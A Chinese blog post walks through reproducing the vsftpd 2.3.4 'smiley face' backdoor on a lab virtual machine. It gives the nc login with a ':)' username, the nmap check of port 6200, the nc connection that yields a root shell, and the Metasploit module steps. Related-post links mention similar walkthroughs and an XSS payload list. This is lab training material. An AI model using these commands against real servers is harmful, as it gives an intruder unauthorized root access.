渗透测试(笑脸漏洞)

于 2023-12-13 12:15:57 发布
阅读量159 收藏 1
点赞数
文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74300881/article/details/134933329
版权

一、Ftp笑脸漏洞原理

在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。

二.操作

1.在虚拟机中查看ip

2.查看6200端口开放情况

是closed,没有开放。

3.查看21端口FTP服务的版本信息

21端口,vsftpd 2.3.4

4.用nc连接21端口并通过笑脸漏洞登录

nc 192.168.142.132 21

user处:)回车

pass处随意输入即可回车

注意:这里需要手动输入,此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会随之关闭

5.查看6200端口是否开放

这里需要另起一个端口

nmap -p 6200 192.168.142.132

open即为开发了,可以连接

6.连接6200端口获得shell

nc 192.168.142.132 6200

三.用msfconsole利用漏洞

1.打开msfconsole

2.寻找vsftpd

search vsftpd

3.使用漏洞,输入指示命令

use 1即可

4.更改rhosts ip号参数

5.run,执行攻击exploit,得靶机shell

照不见三千里
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
渗透测试漏洞研究工具
01-23
一款免费的渗透测试漏洞研究工具包,包含大量工具,如oracle暴力破解等
笑脸漏洞复现
qq_60905276的博客
10-24 700
先来了解一下这个漏洞原理:在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且。利用瑞士小军刀(netcat),连接靶机的21端口,输入user带有:),pass随便输入。v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。再用主机扫描靶机的操作系统,看看靶机开放了哪些端口。例如:user a:) pass 123456。然后再打开一个终端查看6200端口是否已经打开。接下来我们要去看看他的FTP服务版本的信息。
笑脸漏洞(VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 4509
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
shell脚本连接ftp推送文件夹_FTP笑脸漏洞复现
weixin_39770165的博客
12-12 321
转载: Sec盾Ftp笑脸漏洞原理:是因为在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root目标:metasploit2(靶机 ip地址:192.168.48.138)攻击机:我们使用自己的kali我们要确保自己的kali和靶机能ping通(网络相同)靶机的ip地址:...
笑脸漏洞的复现
m0_57511185的博客
12-13 1834
vsftpd 2.3.4亦称为笑脸漏洞 1、漏洞背景 此漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有":)"(这大概就是此漏洞名字的来源),密码任意,即可运行vsf_sysutil_extra():打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器漏洞危害很大。 2、实现过程 2.1打开Metasplotable2,在终端输入:ifconfig,查看其ip地址 2.2查看打开Metasplo...
Ftp笑脸漏洞复现(后门漏洞
qq_55857040的博客
12-13 5018
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 1570
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 778
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
FTP笑脸漏洞
weixin_44237647的博客
01-29 3732
首先保证虚03拟机,kali虚拟机,metasploitable虚拟机主机相互ping的通。 FTP是C/S的模式。位于网络传输协议的应用层,21号端口通信。 03 ip 192.168.10.128 metasploitable ip 192.168.10.129 (简称meta) kali ip 192.168.10.133 主机 ip 192.168.1.4 FTP在03,meta上搭建。 ...
VSFTPD2.3.4笑脸漏洞复现
m0_60466340的博客
12-11 588
在vsftpd2.3.4版本中有一个后门 ,在检测到用户名带有特殊字符:)时,会自动打开6200端口。 复现过程: 用nmap扫面本网段内的主机,发现有打开21端口,用于传输ftp的主机 探测该主机的ftp服务器版本信息,可以看到该版本是存在笑脸漏洞的版本 用netcat连接该主机的21端口,输入带有:)的用户名,和随便一个password 这时候就是以root的权限登录了,可以通过netcat查看6200端口的用户信息 ...
渗透测试漏洞扫描的区别
04-26
了解渗透测试漏洞扫描的区别主要区别和使用场景,二者是否需要人为参与或是否是自动化。可以了解到具体使用的应用,比如防火墙,路由器,交换机服务器等等,对于产品的安全和使用有更深层次的了解。
电力行业+网络安全+渗透测试+漏洞扫描
08-16
伴随着互联网技术的普及与应用,网络安全问题已经上升到国家安全的层次;放眼世界,近些年电力、石油、汽车制造的等基础性行业遭到网络入侵的事件屡见不鲜,可以说没有网络安全就没有国家安全。...
渗透测试 漏洞xss payload大全
12-04
8k加语句,一次插个爽
渗透测试漏洞扫描工具AWVS附安装使用教程
07-12
Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。AWVS是渗透测试的常用工具,操作简单
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞
qq_58018041的博客
04-22 3118
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 4738
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
vsftpd笑脸漏洞
qq_70303095的博客
04-26 202
ftp笑脸漏洞原理在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞
qq_34914659的博客
08-09 2860
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 7643
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
渗透测试常见漏洞原理
最新发布
10-20
渗透测试常见漏洞原理包括但不限于以下几种: 1. 越权漏洞:越权漏洞是指攻击者通过某种方式绕过了系统的权限控制机制,获得了比其权限更高的操作权限,从而可以执行一些不被允许的操作。 2. XSS漏洞:XSS漏洞是指...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值